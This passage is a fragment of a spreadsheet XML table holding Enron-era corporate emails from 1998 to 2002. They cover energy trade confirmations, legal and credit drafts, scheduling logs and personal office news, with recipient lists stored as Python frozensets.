To: "Andy Hutson" &lt;andy_hutson@starkey.com&gt;,	"Kathy Rall" &lt;kcrall@earthlink.com&gt;,	"Mike Kotar" &lt;Mike.Kotar@psiusa.com&gt;,	"Matt Vance" &lt;matt_vance@hotmail.com&gt;,	"Kevin Brenda" &lt;kevin@nativeresources.com&gt;,	"Dianne &amp; Tom Wasgatt" &lt;AZtomwas@worldnet.att.net&gt;,	"Elizabeth Wasgatt" &lt;emw3@dana.ucc.nau.edu&gt;,	"Lisa Fraizer" &lt;FIREBIRD2@mindspring.com&gt;,	"Lydia McDonald" &lt;lydia@nativeresources.com&gt;,	"Melanie Travis" &lt;golfgrrrl97@aol.com&gt;,	"Patty Cascio" &lt;patty@nativeresources.com&gt;,	"Walter Barrios" &lt;wbarrios1@msn.com&gt;,	"Marjut Coursaris" &lt;M_Coursaris@beutel-can.com&gt;_x000D_
Subject: Ground Zero_x000D_
Date: Fri, 19 Oct 2001 08:00:31 -0700_x000D_
X-Priority: 3_x000D_
X-MSMail-Priority: Normal_x000D_
X-Mailer: Microsoft Outlook Express 5.00.2314.1300_x000D_
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300_x000D_
Mime-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary="=_3369D5E1.AFCEAB73"_x000D_
_x000D_
This is an aerial photo of Ground Zero.  Perhaps this will help us understand the true magnitude of the destruction.  God Bless._x000D_
_x000D_
Click here:  http://userwww.service.emory.edu/~rdgarr/WTC.htm_x000D_
_x000D_
_x000D_
 - Part.001 </t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dow Jones Index Definitions</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
Following are the exact definitions of each Dow Jones Index Price in which we _x000D_
participate. This was originally a question Stew had, but I thought it might _x000D_
be helpful for all of you to be able to reference. I'll keep a copy of these _x000D_
definitions at my desk as well._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
---------------------- Forwarded by Kate Symes/PDX/ECT on 04/23/2001 04:16 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Onukogu, Ernest" &lt;Ernest.Onukogu@dowjones.com&gt; on 04/23/2001 04:08:44 PM_x000D_
To: "'kate.symes@enron.com'" &lt;kate.symes@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: definitions_x000D_
_x000D_
_x000D_
Kate,_x000D_
_x000D_
Enclosed are the definitions as promised._x000D_
_x000D_
Cheers,_x000D_
_x000D_
Ernest Onukogu_x000D_
Energy Services_x000D_
Dow Jones &amp; Company_x000D_
P.O.Box 300_x000D_
Princeton, N.J. 08543-0300_x000D_
609 520-4663_x000D_
 &lt;&lt;COB-def.doc&gt;&gt;  &lt;&lt;MID-C-def.doc&gt;&gt;  &lt;&lt;PaloVerde-def.doc&gt;&gt;_x000D_
_x000D_
 - COB-def.doc_x000D_
 - MID-C-def.doc_x000D_
 - PaloVerde-def.doc_x000D_
---------------------- Forwarded by Kate Symes/PDX/ECT on 04/23/2001 04:16 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Onukogu, Ernest" &lt;Ernest.Onukogu@dowjones.com&gt; on 04/23/2001 04:14:15 PM_x000D_
To: "'kate.symes@enron.com'" &lt;kate.symes@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: definitions_x000D_
_x000D_
_x000D_
Kate,_x000D_
_x000D_
 &lt;&lt;MeadMktPlace-def.doc&gt;&gt;  &lt;&lt;NP15 SP15 def.doc&gt;&gt;_x000D_
Ernest Onukogu_x000D_
Energy Services_x000D_
Dow Jones &amp; Company_x000D_
P.O.Box 300_x000D_
Princeton, N.J. 08543-0300_x000D_
609 520-4663_x000D_
_x000D_
_x000D_
 - MeadMktPlace-def.doc_x000D_
 - NP15 SP15 def.doc_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 Aug 2000 07:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CAISO NOTICE: Executive Summary of Stakeholder's Comments...</t>
  </si>
  <si>
    <t xml:space="preserve">Market Participants:_x000D_
_x000D_
The ISO has posted on its web site an Executive Summary of Stakeholders'_x000D_
comments as well as a compilation of all comments received in prior to the_x000D_
August 1 ISO Governing Board meeting.  You can view these documents at_x000D_
http://www.caiso.com/clientserv/congestionreform.html_x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
Byron Woertz_x000D_
Director, Client Relations_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Aug 2000 09:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hope.vargas@enron.com', 'cindy.stokes@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
Please be informed that I will not be attending tomorrow's activities @ 2pm.  _x000D_
However,  I will be here until my regular time taking advantage of this _x000D_
opportunity to begin archiving._x000D_
_x000D_
Thanks_x000D_
Dana</t>
  </si>
  <si>
    <t>Thu, 6 Jan 2000 01:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marty_oelmann@cargill.com'})</t>
  </si>
  <si>
    <t>Enron Corp. guaranty covering physical/financial</t>
  </si>
  <si>
    <t xml:space="preserve">Happy New Year!_x000D_
Attached is a new draft of the Enron Corp. guaranty which incorporates _x000D_
Andrzej's comments of Dec., 1999 based upon exchanges with Russell Diamond _x000D_
(Enron credit - physical).  Tanya Rohauer (Enron credit - financial) is _x000D_
faxing Andrzej a copy of this guaranty as well.  _x000D_
I need to catch up on our previous discussion regarding the Schedule; you _x000D_
should have received a draft of our Credit Support Annex just before the _x000D_
holidays.  I will touch base with you in a few days.  Sara_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 06:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">I checked in Jeff's trade log - he just stepped into a meeting - and 504970 _x000D_
had been crossed out to show 50 MW. But 505118 only has 25 MW. Does this _x000D_
sound correct? I'm a little confused about what you're asking - should the _x000D_
deals match at 50 MW on peak? Or is one 25 and one 50?_x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson@ENRON_x000D_
01/25/2001 02:48 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: apb checkout  _x000D_
_x000D_
the williams deals with apb at 215.00, should total 150 mw.  we are just _x000D_
missing 25 mw._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                01/25/2001 04:40 PM_x000D_
_x000D_
To: Kerri Thompson/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: apb checkout  _x000D_
_x000D_
505118 has been changed to 1/26 -1/27. Still checking on missing deal._x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson@ENRON_x000D_
01/25/2001 02:12 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: apb checkout_x000D_
_x000D_
505118_x000D_
term should be 26-27_x000D_
_x000D_
missing deal just like deal 505118_x000D_
_x000D_
505223 price should be 300.00_x000D_
_x000D_
misssing 2 deals for bob, will get details._x000D_
_x000D_
thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Mar 2000 07:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>UPDATES FOR APRIL</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the updated version_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 15:09:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 01:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Credit Report--3/22/01</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip M Love/HOU/ECT on 03/22/2001 _x000D_
09:01 AM ---------------------------_x000D_
From: Veronica Espinoza/ENRON@enronXgate on 03/22/2001 09:00 AM_x000D_
To: Janie Aguayo/HOU/ECT@ECT, Diane Anderson/NA/Enron@Enron, Derek _x000D_
Bailey/Corp/Enron@ENRON, David Baumbach/HOU/ECT@ECT, Jean Bell/HOU/ECT@ECT, _x000D_
Patricia Boulanger/CAL/ECT@ECT, Bob Bowen/HOU/ECT@ECT, Julie _x000D_
Brewer/NA/Enron@Enron, Lesli Campbell/ENRON@enronXgate, Celeste _x000D_
Cisneros/NA/Enron@Enron, Sharon Crawford/CAL/ECT@ECT, Richard _x000D_
Deming/NA/Enron@Enron, Russell Diamond/ENRON@enronXgate, Cindy _x000D_
Feldman/CAL/ECT@ECT, Darron C Giron/HOU/ECT@ECT, Veronica _x000D_
Gonzalez/ENRON@enronXgate, Jeffrey C Gossett/HOU/ECT@ECT, Walter _x000D_
Guidroz/ENRON@enronXgate, Larry Joe Hunter/HOU/ECT@ECT, Kam _x000D_
Keiser/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Errol _x000D_
McLaughlin/Corp/Enron@ENRON, Nidia Mendoza/ENRON@enronXgate, Tom _x000D_
Moran/ENRON@enronXgate, Bianca Ornelas/NA/Enron@Enron, Leslie _x000D_
Reeves/HOU/ECT@ECT, Tanya Rohauer/ENRON@enronXgate, Dianne Seib/CAL/ECT@ECT, _x000D_
Linda Sietzema/CAL/ECT@ECT, Kim S Theriot/HOU/ECT@ECT, Ellen _x000D_
Wallumrod/NA/Enron@ENRON, Melinda Whalen/CAL/ECT@ECT, Tiffany _x000D_
Williams/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Credit Report--3/22/01_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 18:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Thanks for your note. I want to wish you the best of luck in EES. As far as RAC's issues with EES, I would suggest getting together with Tribolet and getting some of the lists that have been put together as part of the task force. I would also suggest attending the task force meeting, providing EES management is agreeable, to get a better picture of what is going on._x000D_
_x000D_
Again, I hate to see you go but it will still be value added to RAC and Enron. Have fun!!_x000D_
_x000D_
Rick</t>
  </si>
  <si>
    <t>Wed, 2 Aug 2000 08:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'janice.moore@enron.com', 'kaye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'linda.simmons@enron.com', 'linda.noske@enron.com', 'richard.sanders@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'shonnie.daniel@enron.com', 'mark.taylor@enron.com', 'jenny.helton@enron.com', 'ed.iii@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'jan.king@enron.com', 'janette.elbertson@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'linda.guinn@enron.com', 'samantha.boyd@enron.com', 'mary.cook@enron.com', 'lance.schuler-legal@enron.com', 'becky.tlucek@enron.com', 'sandi.braband@enron.com', 'jason.peters@enron.com', 'taffy.milligan@enron.com', 'bob.carter@enron.com', 'susan.bailey@enron.com', 'sheila.tweed@enron.com', 'chaundra.woods@enron.com', 'erica.braden@enron.com', 'janet.moore@enron.com', 'barbara.gray@enron.com', 'mark.haedicke@enron.com', 'dan.hyvl@enron.com', 'pat.radford@enron.com', 'elizabeth.lauterbach@enron.com', 'wayne.gresham@enron.com', 'merrill.haas@enron.com', 'paula.craft@enron.com', 'samantha.ferguson@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'richard.jeffrey@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'steve.hooser@enron.com', 'matt.maxwell@enron.com', 'gloria.cruz@enron.com', 'leslie.hansen@enron.com', 'stuart.zisman@enron.com', 'jeffrey.hodge@enron.com', 'peggy.banczak@enron.com', 'anne.koehler@enron.com', 'eric.gillaspie@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'stacy.dickson@enron.com', 'kay.young@enron.com', 'susan.flynn@enron.com', 'debra.perlingiere@enron.com', 'reginald.shanks@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'michael.robison@enron.com', 'peter.vecchio@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'joya.davis@enron.com', 'travis.mccullough@enron.com', 'claudia.meraz@enron.com', 'brenda.whitehead@enron.com', 'brent.hendry@enron.com', 'martin.penkwitz@enron.com', 'deb.korkmas@enron.com', 'twanda.sweet@enron.com', 'ann.white@enron.com', 'william.nealy@enron.com', 'roger.balog@enron.com', 'teresa.bushman@enron.com', 'elizabeth.sager@enron.com', 'john.viverito@enron.com', 'dan.lyons@enron.com', 'shari.stack@enron.com', 'mary.heinitz@enron.com', 'tana.jones@enron.com', 'carol.clair@enron.com', 'sheri.cromwell@enron.com'})</t>
  </si>
  <si>
    <t>Update on Gabrielle Grace</t>
  </si>
  <si>
    <t>Gabrielle Curie Grace_x000D_
Born:  7/30/00  11:56 p.m._x000D_
Weight:  6 lbs.  10 oz._x000D_
Length:  19 inches_x000D_
_x000D_
As  many of you already know, Gabrielle was diagnosed with a congenital heart _x000D_
defect called hypoplastic left heart syndrome, which means that the left side _x000D_
of her heart did not develop correctly.  Today she is undergoing the first of _x000D_
three surgeries designed to re-plumb the heart so that the right side does _x000D_
all the work.  This first step is a very dangerous and complicated _x000D_
procedure.  The second and third operations will take place at 6 months and 3 _x000D_
years of age.  Fortunately, Texas Children's Hospital has the best infant _x000D_
cardiac department in the country.  _x000D_
_x000D_
Gabrielle was taken into surgery at 8:30 a.m. and still has a few hours to _x000D_
go.  I last spoke to Jim around 2:00 p.m. and he said that things were going _x000D_
well, and that there have been no complications.  Jim and Michele wanted to _x000D_
express their gratitude for the outpouring of love and prayer.  Let's all _x000D_
keep praying and stay optimistic for the best possible outcome!_x000D_
_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Dina K. Snow_x000D_
Enron North America Corp._x000D_
Legal Dept.  EB3822_x000D_
(713) 345-7099_x000D_
dina.snow@enron.com</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 04:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>statement of no coverage</t>
  </si>
  <si>
    <t>I need to have a form filled out that says I don't have health insurance _x000D_
coverage through Enron.  Can you find out who I need to send it to in HR?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 7 Jul 2000 07:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lametrice.dopson@enron.com'})</t>
  </si>
  <si>
    <t>Re: Update: Lack of Response to July 4th Voicemail Help Desk</t>
  </si>
  <si>
    <t>thanks for the follow-up_x000D_
mike</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 10:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PGET/Avista EEMC Signature</t>
  </si>
  <si>
    <t xml:space="preserve">Here are the revised documents that we will need EEMC to sign.  Please _x000D_
coordinate signatures w Travis._x000D_
_x000D_
Thanks_x000D_
Elizabeth_x000D_
_x000D_
_x000D_
36349_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 18:54:26 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'maolczak@bpa.gov'})</t>
  </si>
  <si>
    <t>frozenset({'reese.chris@enron.com', 'harris.kimberely@enron.com', 'simonich.pete@enron.com', 'lyn.williams@enron.com', 'richard.goddard@enron.com', 'donaldson.marc@enron.com', 'reedy.dana@enron.com', 'rough.doug@enron.com', 'hoerner.joe@enron.com', 'pederson.margaret@enron.com', 'haymaker.tom@enron.com', 'law.andy@enron.com', 'liu.nan@enron.com', 'martinez.deborah@enron.com', 'johnson.don@enron.com', 'clark.warren@enron.com', 'hill.denise@enron.com', 'park.phil@enron.com', 'scott.aleka@enron.com', 'macmillan.roy@enron.com', 'leland.john@enron.com', 'diana.scholtes@enron.com', 'spigal.harvey@enron.com', 'sims.jamie@enron.com', 'oakley.chris@enron.com', 'schlect.jeff@enron.com', 'jerry.thale@enron.com', 'gruel.larry@enron.com', 'guyer.brent@enron.com'})</t>
  </si>
  <si>
    <t>West of Hatwai Cutplane Letter</t>
  </si>
  <si>
    <t xml:space="preserve">Many of you will soon receive the attached letter from Bob King in the mail._x000D_
This letter is being emailed to include additional addressees not included_x000D_
in the original distribution.  Please let me know if you have any questions._x000D_
_x000D_
Margaret Olczak_x000D_
Bonneville Power Administration_x000D_
Transmission Marketing &amp; Sales	_x000D_
(360) 418-2071_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;WOH Cutplane Ltr.doc&gt;&gt; _x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Dec 2001 16:27:31 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dandjmccarty@aol.com'})</t>
  </si>
  <si>
    <t>Kilmer worksheets</t>
  </si>
  <si>
    <t xml:space="preserve">Attached are Rob's worksheets._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Fran Fagan_x000D_
_x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 06:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bill.rapp@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Damages Limitations</t>
  </si>
  <si>
    <t xml:space="preserve">Bill and Vince, please see the attached memorandum.  Vince, this relates to _x000D_
what we briefly spoke about during our recent meeting._x000D_
_x000D_
Cheryl, can you set up a meeting for Bill, Vince and I to meet and discuss?_x000D_
_x000D_
Thanks._x000D_
_x000D_
RZ_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 11:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'paul.pizzolato@enron.com'})</t>
  </si>
  <si>
    <t>DLJ - total return swap (bond/debt) form of confirmation</t>
  </si>
  <si>
    <t>Paul:  Please email the confirm format.  Thanks.  Sara</t>
  </si>
  <si>
    <t>Tue, 21 Mar 2000 09:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mmetts@enron.com', 'skean@enron.com'})</t>
  </si>
  <si>
    <t>Confidential</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Mitchell Taylor/Corp/Enron on_x000D_
03/21/2000 05:49 PM ---------------------------_x000D_
_x000D_
_x000D_
Francisco Pinto Leite@ENRON_DEVELOPMENT_x000D_
03/21/2000 05:38 PM_x000D_
_x000D_
To:   Amit Walia@ECT_x000D_
cc:   Mitchell Taylor/Corp/Enron@ENRON, fsayre@ei.enron.com, Randy_x000D_
      Young/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
_x000D_
Subject:  Confidential_x000D_
_x000D_
Apparently our local counsel in Puerto Rico had a small "change of heart"_x000D_
as to the transfer restrictions for San Juan Gas, Procaribe and Progasco._x000D_
Although the statute does not contain a change of control provision with_x000D_
respect to the licenses, it appears that after carefully looking into this_x000D_
issue, local counsel found out that the Puerto Rican authorities are taking_x000D_
a very aggressive approach with respect to transfers of control of holders_x000D_
of licenses.  Apparently the Puerto Rican authorities argue that the spirit_x000D_
of the statute is to extend the requirement of prior authorization for_x000D_
transfers of the licenses, to a change of control of the operator.  In his_x000D_
response to Bill Weiland from V&amp;E he advised that it would be more prudent_x000D_
to request permission to change control of the company that holds the_x000D_
license._x000D_
_x000D_
FPL_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 Dec 1998 03:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Elektro Letter : ECT and EI</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mark - ECT Legal Taylor/HOU/ECT on _x000D_
12/16/98 11:07 AM ---------------------------_x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
12/15/98 05:49 PM_x000D_
To: Mark - ECT Legal Taylor/HOU/ECT@ECT, Susan Flynn/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Elektro Letter : ECT and EI_x000D_
_x000D_
_x000D_
Attached is the latest redline draft of the letter to signed by ECT and EI.  _x000D_
I have never received any comments from anyone.  Mark, you heard Ray Bowen's _x000D_
voice mail.  Thanks.  Sara_x000D_
---------------------- Forwarded by Sara Shackleton/HOU/ECT on 12/15/98 05:44 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Joyce Dorsey_x000D_
12/15/98 04:24 PM_x000D_
To: Raymond Bowen/HOU/ECT@ECT, Clement Lau/HOU/ECT@ECT, Chris _x000D_
Day/HOU/ECT@ECT, AnnMarie Tiller/Corp/Enron@Enron, James _x000D_
Ginty/Corp/Enron@Enron, Michael Herman/Corp/Enron@Enron, Kathy M _x000D_
Lynn/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, David _x000D_
Chang/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Barry J _x000D_
Schnapper@ENRON_DEVELOPMENT, Mitch _x000D_
Taylor/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cassandra _x000D_
Schultz/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Lynn _x000D_
Aven/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Robert H _x000D_
George/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cliff _x000D_
Shedd/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sara Shackleton/HOU/ECT@ECT, _x000D_
Pushkar Shahi/HOU/ECT@ECT, Harry Arora/HOU/ECT@ECT, Kent _x000D_
Castleman/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Edson _x000D_
Pavao/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Nancy _x000D_
Muchmore/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Michael D _x000D_
Jones/AA/Corp/Enron@Enron_x000D_
cc:  _x000D_
Subject: Samba Draft_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Joyce Dorsey/HOU/ECT on 12/15/98 04:23 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Jenny Helton_x000D_
12/15/98 03:04 PM_x000D_
To: Kathy M Lynn/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, David _x000D_
Chang/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Bob Bowen/HOU/ECT@ECT, Gareth _x000D_
Bahlmann/HOU/ECT@ECT_x000D_
cc: Sara Shackleton/HOU/ECT@ECT _x000D_
Subject: Samba Draft_x000D_
_x000D_
_x000D_
Attached in the redlined Samba Swap Draft from Sara Shackleton._x000D_
_x000D_
Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 15 Oct 2000 09:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Paint ball</t>
  </si>
  <si>
    <t>I'm there.</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 08:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Enron Canada isda with Transalta</t>
  </si>
  <si>
    <t xml:space="preserve">One note.  We are currently negotiating some credit amendments to this=20_x000D_
agreement._x000D_
_x000D_
_x000D_
_x000D_
=09Limor Nissan/ENRON@enronXgate_x000D_
=0906/07/2001 03:02 PM_x000D_
=09=09=20_x000D_
=09=09 To: Tana Jones/HOU/ECT@ECT_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Enron Canada isda with Transalta_x000D_
_x000D_
Hi Tana,_x000D_
_x000D_
The executed ISDA list says that we=01,ve got one b/t Enron Canada and=20_x000D_
Transalta.  Can I get a copy of the docs faxed to me asap??_x000D_
_x000D_
Thanks a lot,_x000D_
_x000D_
Limor_x000D_
_x000D_
Enron Global Markets_x000D_
520 Madison Avenue_x000D_
New York, NY 10022_x000D_
Tel: 212.715.5283_x000D_
Fax: 212.715.5608_x000D_
E-Mail: Limor.Nissan@Enron.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 10:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>U.S. Portfolio Managers' Spotlight:March 23, 2001</t>
  </si>
  <si>
    <t>The enclosed research report is being sent to you from PaineWebber by:_x000D_
_x000D_
 Emery Financial Group_x000D_
_x000D_
 713-957-7060_x000D_
_x000D_
 henry.emery@PaineWebber.COM_x000D_
_x000D_
Please contact them if you have any questions or would like to discuss this _x000D_
material._x000D_
_x000D_
The information contained in the attached research report is believed to be _x000D_
reliable, but its accuracy is not guaranteed.  PaineWebber Incorporated _x000D_
and/or Mitchell Hutchins Asset Management Inc., affiliated companies and/or _x000D_
their officers, directors, employees or stockholders may at times have a _x000D_
position, including an arbitrage position, in the securities described herein _x000D_
and may sell or buy them to or from customers.  These companies may from time _x000D_
to time act as a consultant to a company being reported upon._x000D_
_x000D_
You will need the Adobe Acrobat Reader to view this document.  If you don't _x000D_
already have it just click on this link, _x000D_
http://www.adobe.com/prodindex/acrobat/readstep.html, and follow the _x000D_
on-screen instructions.  The Acrobat Reader is free of charge._x000D_
_x000D_
_x000D_
_x000D_
 - P005728020010323D02.pdf</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 14:27:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.hayden@enron.com', 'fred.lagrasta@enron.com'})</t>
  </si>
  <si>
    <t>RE: Sempra</t>
  </si>
  <si>
    <t xml:space="preserve">I have no idea what this is but don't do anything Fred until I find out_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayden, Frank  _x000D_
Sent:	Friday, October 26, 2001 4:26 PM_x000D_
To:	Kitchen, Louise; Lagrasta, Fred_x000D_
Cc:	Williams, Jason R (Credit); Espinoza, Veronica_x000D_
Subject:	Sempra_x000D_
Importance:	High_x000D_
_x000D_
Fred,_x000D_
I looked at volumes, below is what we need to sell Sempra.  Please let keep us posted._x000D_
Thanks_x000D_
Frank_x000D_
_x000D_
_x000D_
Month	$	# K	Rec. Amt.	MMBTU	_x000D_
Nov.	3.04	        263 	 $         8,000,000 	10000	_x000D_
Dec.	3.18	        157 	 $         5,000,000 	10000	_x000D_
Jan.	3.31	        211 	 $         7,000,000 	10000	_x000D_
 	 	        632 	Contracts to sell	 	</t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 09:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Speaker Topics and Assignments</t>
  </si>
  <si>
    <t>yep -hooray!</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 11:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>I think we all decided that COB S/N and NOB S/N should become a basis point _x000D_
unto themselves.  Remapping the S/N  has not been thoroughly explored _x000D_
regarding implications to existing deals and has not been re-mapped in table _x000D_
edit nor has a basis point been created.  Currently COB S/N and COB N/S = R8; _x000D_
and NOB S/N = Basis Pt #22 which is also what NOB N/S is mapped as.  We'll _x000D_
probably only appreciate the revaluation on a shoulder month basis, but I _x000D_
believe it is material.</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 17:37:59 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 2/6/02; HourAhead hour: 16;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 2/6/02; HourAhead hour: 16;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002020616.txt_x000D_
!!!General SQL error._x000D_
Couldn't update; currently locked by user 'admin' on machine 'NAHOU-TRDTS4'._x000D_
Table_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTstNW_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 2/6/02_x000D_
  TIE_POINT: MALIN_5_RNDMTN_x000D_
  INTERCHG_ID: ENRJ_CISO_3000_x000D_
  ENGY_TYPE: FIRM_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 03:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 12/08/2000 11:15 AM -----_x000D_
_x000D_
	Mary Cook_x000D_
	12/08/2000 10:00 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT, Susan Bailey/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: PG&amp;E_x000D_
_x000D_
_x000D_
This is the list of financial trades with PG&amp;E power sub--going out on our _x000D_
omnibus.  This looks like a good candidate for a master.  Mary_x000D_
_x000D_
Cordially,_x000D_
Mary Cook_x000D_
Enron North America Corp._x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas   77002-7361_x000D_
(713) 345-7732 (phone)_x000D_
(713) 646-3490 (fax)_x000D_
mary.cook@enron.com_x000D_
----- Forwarded by Mary Cook/HOU/ECT on 12/08/2000 09:57 AM -----_x000D_
_x000D_
	Rhonda L Denton_x000D_
	12/08/2000 09:52 AM_x000D_
		 _x000D_
		 To: Mary Cook/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: _x000D_
_x000D_
_x000D_
_x000D_
This report does not have volume or prices.  If you need this info, let me _x000D_
know._x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 19:15:07 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gasnews@mail.energycentral.com'})</t>
  </si>
  <si>
    <t>Daily Gas News - 2/5/02</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 Energy Central Job Center =09_x000D_
_x000D_
_x000D_
